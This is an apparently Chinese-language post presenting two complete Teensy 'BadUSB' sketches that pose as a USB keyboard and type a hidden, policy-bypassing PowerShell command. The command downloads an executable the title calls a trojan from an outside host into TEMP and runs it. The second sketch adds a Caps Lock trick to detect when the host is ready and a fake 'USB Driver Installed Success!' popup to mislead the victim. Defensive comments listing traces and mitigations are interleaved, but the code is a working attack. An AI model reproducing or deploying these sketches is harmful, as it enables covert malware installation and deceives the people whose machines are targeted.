Teensy BadUSB:远程下载木马并执行,执行后窗口自动退出,速度极快,用了一点小技巧。

这个是窗口一闪而过的安装脚本:

#define print Keyboard.println

// Arduino/Teensy entry point: runs once when the board is powered, i.e. as
// soon as it is plugged in. The board acts as a USB keyboard and types the
// sequence below without any user interaction.
//
// Host-side traces a defender can look for (all visible in the typed string):
//   - cmd started from the Run dialog, then powershell launched with
//     -windowstyle hidden, -NoProfile, -NonInteractive, -ExecutionPolicy Bypass
//     (process-creation logging with command lines captures this);
//   - the BitsTransfer module fetching an .exe over plain HTTP from an
//     external host (BITS client operational log, proxy/DNS logs);
//   - a freshly written executable started from the user's TEMP directory.
// Mitigations that apply to this pattern: restricting installation of new
// USB HID devices, application allow-listing that blocks execution from
// TEMP, and PowerShell command-line / script-block logging.
void setup() { 
  // Windows key + R; win_press() also waits 3 s before returning.
  win_press(KEY_R);
  print("cmd");// typed as keystrokes, followed by a newline (println)
  press_once(KEY_ENTER);
  delay(500);
  // One-line PowerShell command typed into the console: hidden window,
  // execution-policy bypass, BITS download to TEMP, then launch of the file.
  print("powershell -windowstyle hidden -NoProfile -NonInteractive -ExecutionPolicy Bypass Import-Module BitsTransfer;Start-BitsTransfer http://lonelyrain.me/1.exe \"$env:%TEMP%\\1.exe\";%TEMP%\\1.exe;")
  press_once(KEY_ENTER);
}

// Intentionally empty: all keystrokes are sent from setup(), so the sequence
// is typed once per power-up and nothing repeats afterwards.
void loop() {}

// Sends a single key stroke: press, immediate release, then a fixed 500 ms
// pause before returning.
// InputCommand: key code passed straight to Keyboard.press()/release().
void press_once(unsigned InputCommand)
{
  Keyboard.press(InputCommand);
  Keyboard.release(InputCommand);
  delay(500); // fixed pause after every key stroke
  }

// Sends Alt + <key> as a raw HID report. Not called anywhere in the sketch
// shown above it.
// InputCommand: key code placed in the first key slot of the report.
void alt_press(unsigned InputCommand)
{
  // First report: no modifier, no key (everything released).
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  // Second report: left Alt held together with the requested key.
  Keyboard.set_modifier( KEY_LEFT_ALT ); 
  Keyboard.set_key1(InputCommand);
  Keyboard.send_now();
  }

// Sends <modifier 128> + <key> as a raw HID report, then blocks for 3 s.
// In the USB HID modifier byte, 128 (bit 7) is the right GUI / Windows key,
// so win_press(KEY_R) corresponds to the Win+R chord.
// InputCommand: key code placed in the first key slot of the report.
void win_press(unsigned InputCommand)
{
  // First report: no modifier, no key (everything released).
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  // Second report: modifier bit 128 together with the requested key.
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(InputCommand);
  Keyboard.send_now(); 
  delay(3000); // fixed 3 s wait before the caller starts typing
}

这个是伪造U盘驱动安装提示的脚本:

#define TEENSY2
#ifdef TEENSY2
    #include<usb_private.h>
#endif
#define print Keyboard.println

// Arduino/Teensy entry point: runs once when the board is plugged in and
// types the sequence below as a USB keyboard.
//
// Compared with a plain download-and-run sequence, this variant adds a decoy:
// the console is shrunk with "mode con", and after the download the typed
// PowerShell shows a WScript.Shell popup titled "USB Driver Install" so the
// activity looks like a driver installation to the person at the machine.
//
// Host-side traces a defender can look for (all visible in the typed strings):
//   - "cmd /k mode con:cols=48 lines=9" started from the Run dialog;
//   - powershell with -windowstyle hidden and -ExecutionPolicy Bypass;
//   - a BITS transfer of an .exe over plain HTTP from an external host;
//   - an executable started from the user's TEMP directory;
//   - a WScript.Shell COM object created by powershell to show a popup.
// Mitigations that apply: restricting installation of new USB HID devices,
// application allow-listing for TEMP, and PowerShell command-line /
// script-block logging. A "driver installed" dialog that appears right after
// plugging in a storage-looking device is itself worth reporting.
void setup() {
  // Block until the host reacts to keyboard reports (see wait_for_drivers).
  wait_for_drivers(2000);
  make_sure_capslock_is_off();
  // Windows key + R; win_press() also waits 3 s before returning.
  win_press(KEY_R);
  print("cmd /k mode con:cols=48 lines=9");// small 48x9 console window
  press_once(KEY_ENTER);
  delay(500);
  // One-line PowerShell command: hidden window, BITS download to TEMP, launch
  // of the file, then the decoy popup (second argument 5 is the popup timeout
  // in seconds per the WScript.Shell Popup signature).
  print("powershell -windowstyle hidden -NoProfile -NonInteractive -ExecutionPolicy Bypass Import-Module BitsTransfer;Start-BitsTransfer http://lonelyrain.me/1.exe \"$env:%TEMP%\\1.exe\";%TEMP%\\1.exe;$w=New-Object -ComObject WScript.Shell;$w.popup(\\\"USB Driver Installed Success!\\\",5,\\\"USB Driver Install\\\",65);");
  press_once(KEY_ENTER);
}

// Intentionally empty: all keystrokes are sent from setup(), so the sequence
// is typed once per power-up and nothing repeats afterwards.
void loop() {}

// Sends a single key stroke: press, immediate release, then a fixed 500 ms
// pause before returning.
// InputCommand: key code passed straight to Keyboard.press()/release().
void press_once(unsigned InputCommand)
{
  Keyboard.press(InputCommand);
  Keyboard.release(InputCommand);
  delay(500); // fixed pause after every key stroke
  }

// Returns the keyboard LED state reported by the host (keyboard_leds),
// converted to int.
int ledkeys(void)
{
  const int led_state = int(keyboard_leds);
  return led_state;
}

  
// True when bit 1 (mask 2) of the LED state is set. In the USB HID keyboard
// LED report that bit is the Caps Lock indicator.
bool is_caps_on(void)
{
  const int caps_mask = 2;
  return (ledkeys() & caps_mask) == caps_mask;
}

// Blocks until the host demonstrably processes this device's key reports.
// It records the Caps Lock LED state, then keeps sending Caps Lock strokes
// until the LED state reported back by the host differs from the recorded
// one. After the loop it sends one more Caps Lock stroke, which appears to
// put the LED back to its starting state.
// sleep: extra delay in milliseconds added after every stroke.
//
// Defender note: Caps Lock being toggled by a keyboard within seconds of its
// first enumeration is a behavioural trait of this kind of device.
void wait_for_drivers(int sleep)
{
  bool CapsLockTrap = is_caps_on(); // LED state before any stroke is sent
  while(CapsLockTrap == is_caps_on())
{
    // Caps Lock pressed ...
    Keyboard.set_key1(KEY_CAPS_LOCK);
    Keyboard.send_now();
    delay(200);
    // ... and released (empty report).
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    delay(sleep);
}
    // Same stroke once more after the host has reacted.
    Keyboard.set_key1(KEY_CAPS_LOCK);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    delay(sleep);
}

// Sends one Caps Lock stroke if the host currently reports Caps Lock as on;
// does nothing otherwise. Presumably this keeps the letter case of the text
// typed afterwards as written in the sketch.
void make_sure_capslock_is_off(void)
{
if (is_caps_on())
{
delay(500);
// Caps Lock pressed ...
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
delay(200);
delay(700);
// ... and released (empty report).
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
delay(700);
}
}

// Sends <modifier 128> + <key> as a raw HID report, then blocks for 3 s.
// In the USB HID modifier byte, 128 (bit 7) is the right GUI / Windows key,
// so win_press(KEY_R) corresponds to the Win+R chord.
// InputCommand: key code placed in the first key slot of the report.
void win_press(unsigned InputCommand)
{
  // First report: no modifier, no key (everything released).
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
  // Second report: modifier bit 128 together with the requested key.
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(InputCommand);
  Keyboard.send_now(); 
  delay(3000); // fixed 3 s wait before the caller starts typing
}